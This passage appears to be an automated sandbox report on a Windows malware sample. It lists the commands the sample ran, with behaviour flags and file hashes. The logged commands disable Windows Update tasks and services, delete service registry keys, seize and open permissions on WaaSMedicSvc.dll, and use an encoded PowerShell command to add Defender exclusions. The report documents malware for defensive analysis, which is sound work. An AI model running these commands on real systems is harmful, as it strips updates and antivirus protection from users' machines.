"\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
(depth 1) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
(depth 1) C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
(depth 1) C:\Windows\system32\icacls.exe
  Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
  - Suspicious use of AdjustPrivilegeToken
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
(depth 1) C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
(depth 1) C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
(depth 1) C:\Windows\system32\takeown.exe
  Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
(depth 1) C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies registry key
(depth 1) C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop dosvc
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop bits
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop wuauserv
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop WaaSMedicSvc
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop UsoSvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Windows\services.exe
  Filesize: 2.0MB
  MD5: 79dbc1a54d33366681f1e926d565cad4
  SHA1: 907cf0ec6784bf140f9759d6931d3697da0fc229
  SHA256: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
  SHA512: 6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  Filesize: 539B
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57